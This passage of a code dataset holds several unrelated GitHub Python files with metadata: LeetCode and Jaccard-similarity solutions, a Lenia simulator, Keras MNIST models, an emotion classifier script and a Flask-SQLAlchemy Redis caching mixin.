\n# Input: emails = [\"a@leetcode.com\",\"b@leetcode.com\",\"c@leetcode.com\"]\n# Output: 3\n# \n# Constraints: \n# \n# 1 <= emails.length <= 100 \n# 1 <= emails[i].length <= 100 \n# emails[i] consist of lowercase English letters, '+', '.' and '@' \n# Each emails[i] contains exactly one '@' character \n# All local names and domain names are non-empty \n# Local names do not start with a '+' character \n# 👍 210 👎 0\n\nfrom typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n    def numUniqueEmails(self, emails: List[str]) -> int:\n        \"\"\"\n        Approach 1: hash set\n        \"\"\"\n        e = set()\n\n        for email in emails:\n            prefix = ''\n            idx, n = 0, len(email)\n            while idx < n:\n                ch = email[idx]\n                if ch == '@' or ch == '+':\n                    break\n                if ch != '.':\n                    prefix += ch\n                idx += 1\n\n            while idx < n and email[idx] != '@':\n                idx += 1\n\n            e.add(prefix + email[idx:])\n        # print(e)\n        return len(e)\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n    # emails = [\"test.email+alex@leetcode.com\", \"test.e.mail+bob.cathy@leetcode.com\",\"testemail+david@lee.tcode.com\"]\n    emails = [\"a@leetcode.com\", \"b@leetcode.com\", \"c@leetcode.com\"]\n    result = Solution().numUniqueEmails(emails)\n    print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[929]独特的电子邮件地址.py","file_name":"[929]独特的电子邮件地址.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29126457835","text":"from scipy import signal\nimport numpy as np\n\n\nclass Lenia:\n    \"\"\"\n    worlds_init is a numpy array of starting conditions whose first dimension has length num_channels.\n    The per-channel starting conditions may be square arrays of any dimension consisting of values\n    between 0 and 1, but they must all have the same dimensions and sizes of dimensions.\n\n    kernels is a nested list: for each target channel, a list of kernel groups, where each group is a\n    dict mapping a source channel to a kernel array. Kernel arrays have the same dimensionality as\n    worlds_init, but the size of each dimension must be less than that of worlds_init.\n\n    growth_params is a nested list aligned with kernels: one 4-element array\n    [scaling, mean_bias, std, interpolation] per kernel group, parameterizing a growth function that\n    interpolates between a sigmoid and a bell curve (see _growth below).\n\n    time_step is a floating point value between 0 and 1, but usually closer to 0. 
This determines\n how much to \"integrate\" the values at each step of the simulation.\n\n num_channels is the integer representing the number of channels in the simulation.\n\n \"\"\"\n\n def __init__(\n self,\n worlds_init,\n kernels,\n kernel_weights,\n growth_params,\n num_channels,\n time_step,\n ):\n self.worlds = worlds_init\n self.kernels = kernels\n self.kernel_weights = kernel_weights\n self.growth_params = growth_params\n self.time_step = time_step\n self.num_channels = num_channels\n\n # TODO: There are lots of consistency checks I should run here\n\n def update(self):\n world_shape = np.shape(self.worlds[0])\n for channel_list_ind in range(self.num_channels):\n kernel_channel_list = self.kernels[channel_list_ind]\n if not kernel_channel_list:\n continue\n kernel_channel_list_len = len(kernel_channel_list)\n convolved_worlds_ind = 0\n convolved_worlds = np.zeros(shape=(kernel_channel_list_len, *world_shape))\n for group_ind in range(kernel_channel_list_len):\n kernel_group = kernel_channel_list[group_ind]\n kernel_weights_group = self.kernel_weights[channel_list_ind][group_ind]\n growth_params_group = self.growth_params[channel_list_ind][group_ind]\n\n convolve_channels = list(kernel_group.keys())\n growth_func = lambda x: self._growth(x, *tuple(growth_params_group))\n\n convolved_worlds[convolved_worlds_ind, ...] = growth_func(\n np.sum(\n [\n kernel_weights_group[convolve_channel]\n * signal.convolve(\n self.worlds[convolve_channel],\n kernel_group[convolve_channel],\n mode=\"same\",\n )\n for convolve_channel in convolve_channels\n ],\n axis=0,\n )\n )\n\n convolved_worlds_ind += 1\n\n self.worlds[channel_list_ind, ...] = self._clip(\n self.worlds[channel_list_ind, ...]\n + self.time_step * np.sum(convolved_worlds, axis=0)\n )\n\n def set_params(self, param_array, included_worlds=[]):\n num_world_params = self.worlds[included_worlds, ...].size\n\n params_ind = 0\n\n self.worlds[included_worlds, ...] 
= np.reshape(\n param_array[params_ind : params_ind + num_world_params],\n (len(included_worlds), *np.shape(self.worlds)[1:]),\n )\n\n params_ind += num_world_params\n\n for channel_list_ind in range(self.num_channels):\n kernel_channel_list = self.kernels[channel_list_ind]\n for group_ind in range(len(kernel_channel_list)):\n kernel_group = kernel_channel_list[group_ind]\n kernel_weights_group = self.kernel_weights[channel_list_ind][group_ind]\n for channel in kernel_group.keys():\n kernel_shape = np.shape(kernel_group[channel])\n kernel_size = np.prod(kernel_shape)\n kernel_group[channel] = np.reshape(\n 2 * (param_array[params_ind : params_ind + kernel_size] - 0.5),\n (kernel_shape),\n )\n params_ind += kernel_size\n\n kernel_weights_group[channel] = 10 * (param_array[params_ind] - 0.5)\n params_ind += 1\n\n growth_params_shape = np.shape(\n self.growth_params[channel_list_ind][group_ind]\n )\n growth_params_size = np.prod(growth_params_shape)\n self.growth_params[channel_list_ind][group_ind] = (\n param_array[params_ind : params_ind + growth_params_size] + 0.0001\n )\n params_ind += growth_params_size\n\n self.time_step = param_array[params_ind]\n\n def get_num_params(self, num_included_worlds=0):\n if num_included_worlds > self.num_channels:\n raise ValueError(\n \"num_included_worlds is greater than the number of channels\"\n )\n num_params = 0\n\n world_shape = np.shape(self.worlds)\n num_world_params = np.prod(world_shape[1:]) * (num_included_worlds)\n num_params += num_world_params\n\n for channel_kernel_list in self.kernels:\n for kernel_group in channel_kernel_list:\n for channel in kernel_group.keys():\n kernel_size = np.size(kernel_group[channel])\n growth_param_size = 4\n num_weights = 1\n\n num_params += kernel_size + growth_param_size + num_weights\n\n # for time step\n num_params += 1\n\n return num_params\n\n def _growth(self, input, scaling, mean_bias, std, interpolation):\n mean_bias = 20 * (mean_bias - 0.5)\n sigmoid = 2 / (1 + np.exp((-input + mean_bias) / std)) - 1\n bell = 2 * np.exp(-(((input - mean_bias) / std) ** 2) / 2) - 1\n\n return scaling * ((1 - interpolation) * sigmoid + interpolation * bell)\n\n def _clip(self, x):\n return np.clip(x, 0, 1)\n\n\ndef LeniaConstructor(\n num_channels, time_step, kernel_radius, world_shape, kernel_architecture\n):\n worlds_init = np.random.uniform(size=(num_channels, *world_shape))\n\n kernel_size = 2 * kernel_radius + 1\n kernel_shape = tuple([kernel_size for x in world_shape])\n kernels = []\n kernel_weights = []\n growth_params = []\n for channel_kernel_list in kernel_architecture:\n channel_kernel_groups = []\n channel_kernel_weights_groups = []\n channel_growth_param_groups = []\n for convolve_channel_group in channel_kernel_list:\n channel_kernel_group = {}\n channel_kernel_weights_group = {}\n for channel in convolve_channel_group:\n channel_kernel_group[channel] = np.random.uniform(size=kernel_shape)\n channel_kernel_weights_group[channel] = np.random.uniform()\n channel_kernel_groups.append(channel_kernel_group)\n channel_kernel_weights_groups.append(channel_kernel_weights_group)\n channel_growth_param_groups.append(np.random.uniform(size=(4)))\n kernels.append(channel_kernel_groups)\n kernel_weights.append(channel_kernel_weights_groups)\n growth_params.append(channel_growth_param_groups)\n\n return Lenia(\n worlds_init, kernels, kernel_weights, growth_params, num_channels, time_step\n 
)\n\n","repo_name":"joshnunley/visual-cartpole","sub_path":"neural_lenia.py","file_name":"neural_lenia.py","file_ext":"py","file_size_in_byte":7844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17220552869","text":"import os\nimport inspect\nfrom pcsg import tool\nfrom pcsg.util import cache\nfrom pcsg.attributes import Attributes\nfrom pcsg.util.external import openscad\n\n\n\n\n# default style definitions\nThumbnailWidth = 320\nThumbnailHeight = 240\nImageWidth = 800\nImageHeight = 600\n\n\n\n\ndef initialize (cachePath):\n \"\"\"\n Initialize the example image builder.\n \"\"\"\n cache.setup (cachePath)\n\n\n\n\ndef getDefaultAttributes ():\n \"\"\"\n Get default attributes for running the exampleimg renderer.\n \"\"\"\n attrs = Attributes.defaults ()\n attrs = attrs.override ({\n 'render.quality': 1,\n 'render.antialias': 1,\n 'rasterize.minAngle': 2,\n 'rasterize.minSize': 0.03,\n 'camera.projection': 'orthogonal',\n 'render.colorScheme': 'PcsgTheme'\n })\n return attrs\n\n\n\n\ndef getThumbnailImageAttributes ():\n \"\"\"\n Return attributes for building a thumbnail image.\n \"\"\"\n attrs = getDefaultAttributes ()\n attrs = attrs.override ({\n 'render.width': ThumbnailWidth,\n 'render.height': ThumbnailHeight,\n 'render.view.axis': True,\n 'render.view.scales': False\n })\n return attrs\n\n\n\n\ndef getImageAttributes ():\n \"\"\"\n Return attributes for building an image.\n \"\"\"\n attrs = getDefaultAttributes ()\n attrs = attrs.override ({\n 'render.width': ImageWidth,\n 'render.height': ImageHeight,\n 'render.view.axis': True,\n 'render.view.scales': True\n })\n return attrs\n\n\n\n\ndef renderImageThumbnail (createSceneFunc, cachePath):\n \"\"\"\n Renders an example image thumbnail.\n \"\"\"\n if inspect.isclass (createSceneFunc):\n if issubclass (createSceneFunc, tool.Tool):\n # calculate example output name\n outputNamePrefix = cachePath + os.path.sep + str (createSceneFunc.__qualname__) + \".thumb\"\n\n # create and run tool instance\n instance = createSceneFunc ()\n commandLineOptions = [\n 'render',\n outputNamePrefix,\n '--fmt', 'png',\n '--cache', cachePath,\n '-w', str (ThumbnailWidth),\n '-h', str (ThumbnailHeight),\n '-z'\n ]\n instance.run (commandLineOptions)\n\n # return output path\n return [outputNamePrefix + '.png']\n else:\n assert False, \"unexpected class\"\n\n else:\n # render csg tree\n attributes = getThumbnailImageAttributes ()\n result = createSceneFunc (attributes, True)\n images = []\n for pair in result:\n images.append (openscad.getRendering ('png', pair[1], pair[0]))\n return images\n\n\n\n\ndef renderImage (createSceneFunc, cachePath):\n \"\"\"\n Renders an example image.\n \"\"\"\n if inspect.isclass (createSceneFunc):\n if issubclass (createSceneFunc, tool.Tool):\n # calculate example output name\n outputNamePrefix = cachePath + os.path.sep + str (createSceneFunc.__qualname__) + \".img\"\n\n # create and run tool instance\n instance = createSceneFunc ()\n commandLineOptions = [\n 'render',\n outputNamePrefix,\n '--fmt', 'png',\n '--cache', cachePath,\n '-w', str (ImageWidth),\n '-h', str (ImageHeight),\n '-z'\n ]\n instance.run (commandLineOptions)\n\n # return output path\n return [outputNamePrefix + '.png']\n else:\n assert False, \"unexpected class\"\n\n else:\n # render csg tree\n attributes = getImageAttributes ()\n result = createSceneFunc (attributes, False)\n images = []\n for pair in result:\n images.append (openscad.getRendering ('png', pair[1], pair[0]))\n return 
images\n","repo_name":"WhiteSheet/pcsg","sub_path":"doc/source/ext/exampleimg/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72282269289","text":"# Jaccard similarity = intersection size / union size\n# watch out for duplicate values\n# treat uppercase and lowercase as the same\n# multiply the final similarity by 65536 and output it\n\n##### Approach\n# split into two-character pairs, apply .upper(), then append to a list\n# since (union = total count - intersection):\n### computing the intersection\n# find the intersection with a nested loop and a visited array\n\ndef solution(str1, str2): # 2 <= length <= 1000\n    answer = 0\n    s1_list = []\n    s2_list = []\n    \n    for i in range(0,len(str1)-1):\n        s = str1[i].upper()+str1[i+1].upper()\n        if s.isalpha():\n            s1_list.append(s) #\t['FR', 'RA', 'AN', 'NC', 'CE']\n    for i in range(0,len(str2)-1):\n        s = str2[i].upper()+str2[i+1].upper()\n        if s.isalpha():\n            s2_list.append(s) # ['FR', 'RE', 'EN', 'NC', 'CH']\n    #print(s1_list)\n    #print(s2_list)\n    \n    share_cnt = 0 # intersection count\n    visited = [False]*len(s2_list)\n    for s1 in s1_list:\n        for s2_i in range(len(s2_list)):\n            if s1 == s2_list[s2_i]:\n                if visited[s2_i] == False:\n                    visited[s2_i] = True\n                    share_cnt += 1\n                    break\n    \n    sum_cnt = len(s1_list) + len(s2_list) - share_cnt\n    #print(\"share\", share_cnt)\n    #print(\"sum\", sum_cnt)\n    if share_cnt == 0 and sum_cnt == 0:\n        answer = 1\n    else:\n        answer = share_cnt / sum_cnt\n    \n    return int(answer*65536)\n","repo_name":"yoo-myeong/Myeongorithm","sub_path":"python/프로그래머스_[1차] 뉴스 클러스터링.py","file_name":"프로그래머스_[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4861054590","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 26 16:33:37 2019\n\n@author: Anastasija\n\"\"\"\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D\nfrom keras.layers import Dense\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data() \n\n\ndef reshapeData(data,vectorDimension):\n    dataReshaped = data.reshape(data.shape[0],28,28,1) \n    return dataReshaped\n\ndef prepareData(data):\n    data = data.astype('float32')\n    data = data/255\n    return data\n\ndef toCategoricalMatrix(data):\n    dataCat = np_utils.to_categorical(data)\n    return dataCat\n\ndef ucitajModel():\n    model = initModel()\n    model.load_weights(\"weights.h5\")\n    return model\n\ndef initModel():\n    model = Sequential()\n    model.add(Conv2D(30, kernel_size=(5, 5), activation='relu',input_shape=(28,28,1)))\n    model.add(MaxPooling2D(pool_size=(2, 2)))\n    model.add(Conv2D(15, kernel_size=(3, 3), activation='relu'))\n    \n    model.add(MaxPooling2D(pool_size=(2, 2)))\n    model.add(Dropout(0.2))\n    \n    model.add(Flatten())\n    \n    model.add(Dense(128, activation='relu'))\n    model.add(Dense(50, activation='relu')) \n    model.add(Dense(10, activation='softmax'))\n    \n    #Compile model \n    model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n    \n    return model\n\nx_train = reshapeData(x_train,x_train[0].shape[0] * x_train[0].shape[1]) \nx_test = reshapeData(x_test,x_test[0].shape[0] * x_test[0].shape[1]) \nx_train = prepareData(x_train)\nx_test = prepareData(x_test) \ny_train =toCategoricalMatrix(y_train)\ny_test =toCategoricalMatrix(y_test)\n\n \n#model = initModel()\n#print(model.summary()) \n#history = model.fit(x_train,y_train,32,epochs = 10,validation_split = 0.25)\n#scores = model.evaluate(x_test, y_test, 
verbose=1)\n#print(\"Baseline Error: %.2f%%\" % (100-scores[1]*100))\n#model.save_weights(\"weights.h5\")\n \n ","repo_name":"rudananastasija/soft","sub_path":"data_train.py","file_name":"data_train.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17220749239","text":"from os.path import basename, splitext\n\nfrom keras.layers import MaxPooling2D, Convolution2D, Dropout, Dense, Flatten\nfrom keras.models import Sequential\n\n\ndef get_model_id():\n return splitext(basename(__file__))[0]\n\n\ndef build(training_data, height=28, width=28):\n # Initialize data\n _, _, _, nb_classes = training_data\n input_shape = (height, width, 1)\n\n # Hyperparameters\n nb_filters = 32 # number of convolutional filters to use\n pool_size = (2, 2) # size of pooling area for max pooling\n kernel_size = (3, 3) # convolution kernel size\n\n model = Sequential()\n model.add(Convolution2D(nb_filters,\n kernel_size,\n padding='valid',\n input_shape=input_shape,\n activation='relu'))\n model.add(Convolution2D(nb_filters,\n kernel_size,\n activation='relu'))\n\n model.add(MaxPooling2D(pool_size=pool_size))\n model.add(Dropout(0.25))\n model.add(Flatten())\n\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(nb_classes, activation='softmax'))\n\n return model\n","repo_name":"WhiteboardLiveCoding/OCRTraining","sub_path":"models/convolutional.py","file_name":"convolutional.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16267889300","text":"from transformers import pipeline\nimport sys\nimport logging\nlogging.getLogger().setLevel(logging.CRITICAL)\n\n\nlogging.getLogger().setLevel(logging.CRITICAL)\n\n\ndef get_highest_emotion_score(output):\n # Use the 'max' function with a key function that returns the 'score' of each dictionary\n highest_emotion = max(output[0], key=lambda emotion: emotion['score'])\n return highest_emotion['label']\n\n\ndef get_emotion(text):\n classifier = pipeline(\"text-classification\",\n model=\"SamLowe/roberta-base-go_emotions\", top_k=None)\n emotion = get_highest_emotion_score(classifier(text))\n return emotion\n\n\nif __name__ == '__main__':\n text = sys.argv[1]\n emotion = get_emotion(text)\n if emotion is not None:\n print(emotion.strip())\n else:\n print(\"\")\n","repo_name":"AznIronMan/nlp_tools","sub_path":"emotions.py","file_name":"emotions.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"949746232","text":"# -*- coding: utf-8 -*-\nimport importlib\nimport itertools\nimport warnings\n\nimport functools\nfrom blinker import signal\nfrom dogpile.cache.api import NO_VALUE\nfrom flask_sqlalchemy import DefaultMeta, Model\nfrom sqlalchemy.ext.declarative import declared_attr\nfrom sqlalchemy import event, inspect\nfrom sqlalchemy.orm.attributes import get_history\nfrom sqlalchemy.orm.base import PASSIVE_NO_INITIALIZE\n\nfrom .utils import current_redica\nfrom .cache import FromCache\n\n\nclass Cache(object):\n default_regions = None\n\n def __init__(self, model, regions, label,\n columns=None, exclude_columns=None,\n invalidate_queries=None, invalidate_relationships=None,\n expiration_time=None):\n self.model = model\n self.cache_regions = regions\n self.label = label\n self.pk = getattr(model, 'cache_pk', 'id')\n self.exclude_columns = 
set(exclude_columns) \\\n if exclude_columns else set()\n self.columns = set(columns) if columns else set()\n self.invalidate_queries = invalidate_queries\n self.invalidate_relationships = invalidate_relationships\n self.expiration_time = expiration_time\n\n @property\n def regions(self):\n return self.cache_regions or self.default_regions\n\n def get(self, pk):\n return self.model.query.options(self.from_cache(pk=pk)).get(pk)\n\n def filter(self, **kwargs):\n limit = kwargs.pop('limit', None)\n offset = kwargs.pop('offset', None)\n order_by = kwargs.pop('order_by', 'asc')\n\n query_kwargs = {}\n if kwargs:\n if len(kwargs) > 1:\n raise TypeError(\n 'filter accept only one attribute for filtering')\n key, value = kwargs.items()[0]\n if key == self.pk:\n yield self.get(value)\n return\n\n if key not in self._columns:\n raise TypeError('%s does not have an attribute %s' % self, key)\n query_kwargs[key] = value\n\n cache_key = self.cache_key(**kwargs)\n\n pks = self.regions[self.label].get(cache_key)\n\n if pks is NO_VALUE:\n pks = [o.id for o in self.model.query.filter_by(\n **query_kwargs).with_entities(getattr(self.model, self.pk))]\n self.regions[self.label].set(cache_key, pks)\n\n if order_by == 'desc':\n pks.reverse()\n\n if offset is not None:\n pks = pks[pks:]\n\n if limit is not None:\n pks = pks[:limit]\n\n keys = [self.cache_key(pk) for pk in pks]\n for pos, obj in enumerate(self.regions[self.label].get_multi(keys)):\n if obj is NO_VALUE:\n yield self.get(pks[pos])\n else:\n yield obj[0]\n\n def flush(self, key):\n self.regions[self.label].delete(key, key_mangle=True)\n\n def keys(self, key_pattern):\n return self.regions[self.label].backend.keys(key_pattern)\n\n def flush_multi(self, key_pattern):\n if not key_pattern.endswith('*'):\n key_pattern += '*'\n backend = self.regions[self.label].backend\n keys = backend.keys(key_pattern)\n if len(keys) > 0:\n backend.delete_multi(keys)\n\n @property\n def _columns(self):\n if not self.columns:\n self.columns = set([\n c.name for c in self.model.__table__.columns\n if c.name != self.pk and c.name not in self.exclude_columns])\n\n return self.columns\n\n def from_cache(self, cache_key=None, pk=None, prefix=None,\n expiration_time=None):\n if pk:\n cache_key = self.cache_key(pk)\n expiration_time = expiration_time or self.expiration_time\n return FromCache(\n self.label, cache_key, query_prefix=prefix,\n cache_regions=self.regions, expiration_time=expiration_time)\n\n def cache_key(self, pk='all', **kwargs):\n q_filter = u''.join(u'{}={}'.format(k, v) for k, v in kwargs.items()) \\\n or self.pk\n return u\"{}:{}:object:{}\".format(\n self.model.__table__, pk, q_filter)\n\n def cache_relationship_key(self, pk, relation_name):\n return u'{}:{}:relationship:{}'.format(\n self.model.__tablename__, pk, relation_name)\n\n def cache_query_key(self, pk, query_name):\n if query_name:\n return u'{}:{}:query:{}'.format(\n self.model.__tablename__, pk, query_name)\n else:\n return u'{}:{}:query'.format(self.model.__tablename__, pk)\n\n def flush_filters(self, obj):\n keys = self._filter_keys(obj)\n keys.append(self.cache_key())\n\n obj_pk = getattr(obj, self.pk)\n if obj_pk:\n keys.append(self.cache_key(obj_pk))\n\n if len(keys) > 0:\n self.regions[self.label].delete_multi(keys)\n\n def _filter_keys(self, obj):\n keys = []\n for column in self._columns:\n added, _, deleted = get_history(\n obj, column, passive=PASSIVE_NO_INITIALIZE)\n for value in itertools.chain(added or (), deleted or ()):\n keys.append(self.cache_key(**{column: value}))\n return 
keys\n\n def flush_caches(self, obj_pk):\n patterns = self._pattern_keys(obj_pk)\n\n backend = self.regions[self.label].backend\n ppl = backend.pipeline()\n for p in itertools.imap(lambda k: backend.key_mangler(k), patterns):\n ppl.keys(p)\n\n keys = []\n for rs in ppl.execute():\n if not rs:\n continue\n keys.extend(rs)\n if len(keys) > 0:\n backend.delete_multi(keys)\n\n def _pattern_keys(self, obj_pk):\n keys = []\n\n if self.invalidate_relationships:\n for r in self.invalidate_relationships:\n keys.append(self.cache_relationship_key(obj_pk, r))\n else:\n keys.append(self.cache_relationship_key(obj_pk, '*'))\n\n if self.invalidate_queries:\n for q in self.invalidate_queries:\n keys.append(self.cache_query_key(obj_pk, q))\n else:\n keys.append(self.cache_query_key(obj_pk, '*'))\n\n return keys\n\n def flush_all(self, obj):\n self.flush_filters(obj)\n\n obj_pk = getattr(obj, self.pk)\n if obj_pk:\n self.flush_caches(obj_pk)\n\n\n_flush_signal = signal('flask_sqlalchemy_redica_flush_signal')\n\n\nclass CachingConfigure(object):\n #: enable cache\n cache_enable = True\n\n #: specify user custom dogpile regions\n #: if not specifed, use the default regions created by redica\n cache_regions = None\n\n #: specify which dogpile region to use\n cache_label = 'default'\n\n #: cache expiration time, default is 1 hour\n cache_expiration_time = 3600\n\n #: if not specified, cache will expire all queries of this object\n cache_queries = ()\n\n #: if not specified, cache will expire all relationships of this object\n cache_relationships = ()\n\n #: only these columns will produce cache indices\n cache_columns = ()\n\n #: these columns will not produce cache indices\n cache_exclude_columns = ()\n\n #: enable cache invalidation\n #: if disabled, cache will only expired until timeout\n #: if enabled, when object changes, cache will invalidate automatically\n cache_invalidate = True\n\n #: only these columns will produce cache invalidate\n cache_invalidate_columns = ()\n\n #: these columns changes will not produce cache invalidate\n cache_invalidate_exclude_columns = ()\n\n #: enable cache invalidate notification\n #: some mapper class can be used only for notification\n #: itself cannot cache and invalidate\n cache_invalidate_notify = False\n\n #: which relation objects will be notified\n cache_invalidate_notify_relationships = ()\n\n #: notify with origin all the way to target\n cache_invalidate_notify_with_origin = False\n\n # private properties\n _initialized = False\n _all_columns = ()\n\n\nclass CachingMixin(CachingConfigure):\n \"\"\"mixin for caching models.\"\"\"\n\n @declared_attr.cascading\n def cache(cls):\n \"\"\"cache object implementation, will be used like::\n\n obj = SomeModel.cache.get(id)\n \"\"\"\n if cls.cache_enable:\n return Cache(\n cls, cls.cache_regions, cls.cache_label,\n columns=cls.cache_columns,\n exclude_columns=cls.cache_exclude_columns,\n invalidate_relationships=cls.cache_relationships,\n invalidate_queries=cls.cache_queries,\n expiration_time=cls.cache_expiration_time\n )\n\n @declared_attr.cascading\n def use_cache(cls):\n \"\"\"Helpers for return if this object use cache\n \"\"\"\n return hasattr(cls, 'cache') and getattr(cls, 'cache_enable')\n\n @classmethod\n def from_cache(cls, pk='all'):\n query_prefix = cls.query_cache_key(pk, '')\n return cls.cache.from_cache(prefix=query_prefix)\n\n @classmethod\n def relationship_cache_key(cls, pk, relation_name):\n return cls.cache.cache_relationship_key(pk, relation_name)\n\n @classmethod\n def query_cache_key(cls, pk, 
query_name):\n return cls.cache.cache_query_key(pk, query_name)\n\n @staticmethod\n def invalidator():\n if current_redica:\n return current_redica.cache_invalidator\n\n @classmethod\n def __declare_last__(cls):\n if cls._initialized:\n return\n\n if cls.cache_enable is False:\n cls.cache_invalidate = False\n\n if len(cls.cache_invalidate_notify_relationships) > 0:\n cls.cache_invalidate_notify = True\n\n if cls.cache_invalidate or cls.cache_invalidate_notify:\n cls.configure_caching()\n\n cls._initialized = True\n\n @classmethod\n def configure_caching(cls):\n mapper = inspect(cls).mapper\n sender = mapper.class_.__name__\n cls.listen_mapper_events(mapper, sender, cls.on_model_change)\n _flush_signal.connect(\n cls.on_model_invalidate, sender=sender, weak=False)\n\n base_mapper = inspect(cls).mapper.base_mapper\n if base_mapper != mapper:\n sender = base_mapper.class_.__name__\n\n if cls.cache_invalidate or cls.cache_invalidate_notify:\n cls.listen_mapper_events(base_mapper, sender,\n cls.on_model_change)\n\n _flush_signal.connect(\n cls.on_model_invalidate, sender=sender, weak=False)\n\n cls.init_invalidate_columns(mapper)\n\n @classmethod\n def init_invalidate_columns(cls, mapper):\n cls._all_columns = set(mapper.attrs.keys())\n cls.cache_invalidate_columns = \\\n cls.cache_invalidate_columns or \\\n set(cls._all_columns) - set(cls.cache_invalidate_exclude_columns)\n\n @classmethod\n def listen_mapper_events(cls, mapper, sender, callback):\n object_update_callback = functools.partial(\n callback, sender, 'update')\n object_delete_callback = functools.partial(\n callback, sender, 'delete')\n object_insert_callback = functools.partial(\n callback, sender, 'insert')\n event.listen(mapper, 'after_update', object_update_callback)\n event.listen(mapper, 'after_delete', object_delete_callback)\n event.listen(mapper, 'after_insert', object_insert_callback)\n\n @classmethod\n def on_model_change(cls, *args):\n sender, ev, _, _, target = args\n kwargs = dict(event=ev, source='model_change',\n module=cls.__module__, model=sender,\n target=target, target_id=target.id)\n if cls.cache_invalidate_notify_with_origin:\n kwargs.update(\n dict(origin_module=cls.__module__, origin_model=sender,\n origin_target=target, origin_target_id=target.id))\n _flush_signal.send(sender, **kwargs)\n\n @classmethod\n def on_model_invalidate(cls, sender, **kw):\n target = kw.get('target')\n src = kw.get('source')\n ev = kw.get('event')\n\n dummy_update = (\n src == 'model_change' and\n ev == 'update' and\n not cls.has_changes(target)\n )\n\n if cls.cache_invalidate:\n if dummy_update:\n # for self update, if no changes, then neither\n # flush nor notify others\n return\n cls.on_flush(**kw)\n elif dummy_update:\n return\n\n if not cls.cache_invalidate_notify:\n return\n\n delay = True\n if ev == 'delete' or src != 'model_change':\n # deletion need flush right away\n delay = False\n\n cls.on_notify(delay=delay, **kw)\n\n @classmethod\n def has_changes(cls, target, use_all=False):\n columns = cls._all_columns if use_all else cls.cache_invalidate_columns\n for column in columns:\n if get_history(target, column,\n passive=PASSIVE_NO_INITIALIZE).has_changes():\n return True\n\n @classmethod\n def relation_changes(cls, target, attr, r):\n history = get_history(target, r)\n if attr.back_populates \\\n and attr.cascade_backrefs \\\n and history.has_changes():\n # backref can update itself\n # no need to broadcast signals\n change_set = history.unchanged or ()\n else:\n change_set = history.sum()\n\n for obj in change_set:\n if 
not obj or obj.id is None:\n # for new obj, it will flush by itself,\n # no need to broadcast signal\n continue\n\n yield obj\n\n @classmethod\n def on_notify(cls, delay=False, **kw):\n target = kw.get('target')\n ev = kw.get('event')\n\n if not target:\n return\n\n mapper = inspect(cls).mapper\n for r in cls.cache_invalidate_notify_relationships:\n attr = mapper.attrs.get(r)\n sender = attr.mapper.class_.__name__\n if not attr.uselist and not getattr(cls, r).impl.active_history:\n warnings.warn(\n 'Scalar relationship %s is with no active_history set. '\n 'Unfetched instance won\\'t be notified.' % attr)\n for obj in cls.relation_changes(target, attr, r):\n kwargs = dict(\n module=attr.mapper.class_.__module__, model=sender,\n target=obj, target_id=obj.id, event=ev, source='notify',\n origin_module=kw.get('origin_module', None),\n origin_model=kw.get('origin_model', None),\n origin_target=kw.get('origin_target', None),\n origin_target_id=kw.get('origin_target_id', None))\n if delay:\n invalidator = cls.invalidator()\n if invalidator:\n invalidator.invalidate(**kwargs)\n else:\n _flush_signal.send(sender, **kwargs)\n\n @classmethod\n def _flush_all(cls, target_id, target):\n if target:\n cls.cache.flush_all(target)\n elif target_id:\n cls.cache.flush_caches(target_id)\n\n @classmethod\n def on_flush(cls, **kw):\n if cls.cache_enable and cls.cache_invalidate:\n target = kw.get('target')\n target_id = kw.get('target_id')\n cls._flush_all(target_id, target)\n\n\nclass CachingInvalidator(object):\n def __init__(self, callback=None):\n self.items = []\n self.callback = callback or self.do_flush\n\n def invalidate(self, **kwargs):\n self.items.append(kwargs)\n\n @staticmethod\n def do_flush(items):\n if current_redica:\n session = current_redica.create_scoped_session()\n for info in items:\n module = info.get('module')\n model = info.get('model')\n target_id = info.get('target_id')\n model_cls = getattr(importlib.import_module(module), model)\n target = session.query(model_cls).get(target_id)\n\n info['target'] = target\n info['source'] = 'flush'\n\n origin_module = info.get('origin_module', None)\n origin_model = info.get('origin_model', None)\n origin_target_id = info.get('origin_target_id', None)\n if origin_module and origin_model and origin_target_id:\n origin_model_cls = getattr(\n importlib.import_module(origin_module), origin_model)\n origin_target = session.query(\n origin_model_cls).get(origin_target_id)\n info['origin_target'] = origin_target\n\n _flush_signal.send(model, **info)\n session.close()\n\n def flush(self):\n items = list(self.items)\n self.items = []\n self.callback(items)\n\n\nclass CeleryCachingInvalidator(CachingInvalidator):\n def invalidate(self, **kwargs):\n kwargs.pop('target', None)\n kwargs.pop('origin_target', None)\n super(CeleryCachingInvalidator, self).invalidate(**kwargs)\n\n def flush(self):\n items = list(self.items)\n self.items = []\n self.callback.delay(items)\n\n\ndef default_caching_invalidate(items):\n CachingInvalidator.do_flush(items)\n\n\ncaching_attributes = [\n (k, v) for k, v in CachingConfigure.__dict__.items()\n if 